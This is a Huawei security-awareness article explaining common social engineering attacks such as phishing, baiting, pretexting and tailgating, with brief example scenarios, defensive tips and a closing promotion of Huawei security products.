What Is Social Engineering?
In a broad sense, social engineering is a discipline. However, when we talk about social engineering, we usually refer to exploits in network security technologies, which is the topic of this document. Social engineering involves deceiving or inducing victims to make mistakes to obtain important personal information, system access, important data, and virtual property, among others. Attackers can use the information obtained from social engineering to launch secondary attacks or directly sell the information to others for a profit.
Technically speaking, social engineering is not an attack technology. It is more akin to a "trick" but one that has adapted to the digital era. Social engineering-based scams are usually designed around people's psychology and behavior, so social engineering attacks are particularly useful for manipulating user behavior. Once attackers understand the motive of the users' behavior, a scam can be tailored to deceive and manipulate the users.
Why Is Social Engineering So Dangerous?
Since social engineering targets people's psychology and behavior, its success rate is very high. After all, everyone makes mistakes, making people the most vulnerable part of a security system. Although victims often doubt the authenticity of emails or phone calls, they would often make the wrong judgments and take the wrong actions if the attack process is well-designed.
In fact, many security incidents are not caused by network protection failures. Attackers usually prefer social engineering attacks on people instead, which is much easier than attacking professional network security systems. This is why we must focus on people-centric network security awareness training to keep them fully informed and alert about social engineering techniques and prevent security systems from being compromised from within.
How Is Social Engineering Implemented?
In order to gain the trust of the victims, attackers typically design their social engineering attacks by following a process.
- Preparation phase: Attackers prepare by collecting the background information of victims. In this phase, attackers mainly focus on identifying the victims and determining the best approach for launching social engineering attacks.
- Penetration phase: Attackers initiate contact with the victims and build trust through information exchange with the intention of infiltrating the victims' defenses.
- Attack phase: Attackers begin collecting the target data of victims using tools and may use the information obtained to launch new attacks.
- Withdrawal phase: After they have achieved their goals, attackers will try to erase all traces of their illicit activities. In some cases, the victims would not even be aware that an attack has occurred.
Common Types of Social Engineering
Phishing is the most common type of social engineering attacks. Attackers steal confidential personal or company information through emails, voice calls, instant messages, online ads, or fake websites.
Phishing can be successful because the fake information and deception look highly authentic. As such, it is easy for victims to overlook the dangers of related operations, greatly improving the success rate of social engineering attacks. In addition, phishing often makes victims feel a sense of urgency, fear, or curiosity, directing their focus on the fabricated information for a short period of time so that they become too pre-occupied to verify the authenticity of the information.
The following is an example:
A victim received an email from a bank claiming an account risk and requiring information such as name, ID card number, mobile phone number, bank card number, and bank card password for account security purposes. However, this is not an email sent by the bank, but a phishing email sent by an attacker. To add to the deception, the attacker may also set up a fake bank website that looks real enough to convince the victim to log in, exposing their key personal information. The victim, fearing a monetary loss, would not carefully verify the authenticity of the information in the email or website, thereby falling into the trap.
Spear phishing is more targeted type of phishing. Relatively speaking, common phishing is more random where attackers do not have specific victims, but disseminates the information widely. In contrast, spear phishing focuses on specific victims, such as enterprise executives or network administrators, to customize a highly effective phishing scheme based on the characteristics, positions, contacts, and other information of the victims. Such techniques improve the success rate of social engineering attacks.
The following is an example:
A victim likes to browse car-related websites. One day, the victim receives an email from what appears to be one of the most visited automobile websites. The email teases a review article of the latest car model and presents a link to the website for more details. Since the topic is highly relevant, the victim is very likely to click, thereby falling into the attacker's trap.
As the name suggests, this social engineering approach exploits people's desire for rewards to lure them into a trap. While this approach is similar to phishing in many aspects, baiting emphasizes on the benefits to trap victims.
The bait can be physical or virtual (after all, we are now in the digital era).
Most physical baits are transmitted in the form of storage media. For example, a USB flash drive may be used as bait. Most people assume that a USB flash drive given as a free gift is empty. Attackers take advantage of this mentality to embed malicious programs that — when plugged into a computer — would infect the system. There is a more dramatic form of deception, in which the USB flash drive is left in a conspicuous location (such as the company lobby or washroom) with eye-catching labels (such as salary details). Out of curiosity, many people would be enticed to take a peek, not knowing that they would become exposed to the attackers.
Virtual bait is much simpler. Attackers only need to design something that looks attractive, for example, links to websites that promise free gifts or links to attractive activities. Naturally, many people are interested in clicking the links, allowing malicious programs to invade the victims' systems.
The name of watering hole comes from nature, where predators wait near the water source to ambush other animals that come for a drink, increasing the predator's chance of success in hunting.
Based on their research, attackers identify the websites frequented by the victims (usually a specific group) and deploy malicious programs on these websites. When the victims access the websites, their computers become infected. In fact, many large websites pay a great deal of attention to network security to prevent themselves from being exploited by attackers, as failure to do so would not only cause distrust from their users but severely damage their reputation. Therefore, many attackers prefer to exploit small and medium websites or websites lacking advanced technologies and funds. Users must be extremely careful when accessing such websites.
Vishing and Smishing
Vishing and smishing can be considered as two different approaches of phishing. The former is based on phone calls, and the latter is based on SMS. The two approaches are clearly aimed at elder victims who are not as familiar with the Internet or understand the "exquisite" tricks, therefore are less susceptible to more high-tech attacks.
For these groups, attackers use more traditional methods — phone calls or text messages — to trap victims. Most attackers use robots for their deception as high-level robots can now offer almost perfect imitations of people for communication, which significantly improves the efficiency of attackers.
For pretexting, attackers assume a false identity to deceive victims. The attacker usually disguises as a person in authority to compel the victims to provide important information as instructed.
The following is an example:
An attacker impersonates a law enforcement officer to gain the trust of a victim, and then asks the victim to provide some personal information for identity verification. Eventually, the victim would provide the required information, which may be used for identity theft or secondary attacks.
Quid Pro Quo
Quid pro quo means that attackers rely on exchange of information or services to make victims cooperate in giving out their important personal information. Similar to baiting, quid pro quo also claims to bring benefits to victims, usually in the form of services, while baiting usually takes the form of physical objects.
The following is an example:
Attackers call victims pretending to be IT support personnel that can provide technical support or software upgrades. In this case, they require the victims to provide their account information to gain temporary permissions. Once the victims provide such information, the attackers can use it to launch attacks or steal information.
Malware makes victims convinced that malicious software has been installed on computers and can only be deleted when they do what was required by the attackers.
Attackers usually require victims to pay a fee before removing the malware. In fact, even if the victims follow the attackers' instructions, the attackers may carry out further exploitations. For example, they might take advantage of this process to obtain key personal information and even install malware.
Tailgating and Piggybacking Attacks
Tailgating attacks are also called piggybacking attacks. For these attacks, an unauthorized person enters a restricted area or system with the authorization of another person.
The following are some common examples:
- An attacker enters a restricted area by closely following the victim as the victim enters.
- An attacker pretends to be an employee who forgets to bring an identity card and asks another employee or doorkeeper to open the door.
- An attacker pretends to borrow a victim's computer and quickly installs malware.
How to Guard Against Social Engineering Attacks
To guard against social engineering attacks, we must first guide people to change their mentality and habits. When everyone understands how social engineering attacks work and how serious the consequences of such attacks are, people will become more diligent and skeptical when checking emails, voicemails, and text messages, or visiting small and medium websites.
However, changing habits and mentality cannot be done overnight, and we need to start by constantly promoting network security knowledge and using example cases to deepen people's impressions. Here are some suggestions in this regard:
- Strengthen network security awareness training to reduce human-induced risks. Some tools and websites can be used to simulate social engineering attacks to hone people's anti-fraud abilities.
- Publicize real-world cases to deepen people's impressions, especially cases involving close relationships such as colleagues or friends. This will make people feel that this is not a distant possibility, but a very real one.
- Enhance network security construction and use multi-factor identity authentication to improve the account security of applications. This is because the primary goal of many social engineering attacks is to gain access permissions of an account.
- Maintain real-time updates of software and systems, and periodically scan the systems for hosts that may be under threat.
- Do not use information that may be obtained publicly, such as birthdays, cities, and pet names, when setting passwords and account permissions.
How Can Huawei Protect You Against Social Engineering Attacks?
In general, the main types of social engineering attacks that ordinary people encounter are phishing emails, spear phishing, watering hole, and baiting. Huawei's security devices and solutions can protect you against most social engineering attacks and reduce potential losses and risks.
- HiSec Security Solution
The HiSec security solution makes threat detection, threat handling, and security O&M more intelligent, improving threat defense capabilities and security O&M efficiency. The zero trust solution can well solve the problem of user permission theft. By leveraging user behavior analysis, user credit scoring, and other means, you can detect risky accounts in a timely manner and terminate related permissions.
- HiSec Insight Advanced Threat Analytics System
HiSec Insight supports multiple advanced security detection technologies, such as abnormal domain name detection, mail anomaly detection, user trustworthiness detection, and network-wide threat situation analysis, to detect various security threat events in real time and restore the entire APT kill chain.
- FireHunter6000 Series Sandbox
The FireHunter restores files in network traffic and analyzes the files in the virtual environment to detect and defend against unknown malicious files.
- USG6000E Series Firewall
- Author： Yan Guanghui
- Updated on： 2021-09-02
- Views： 159
- Average rating：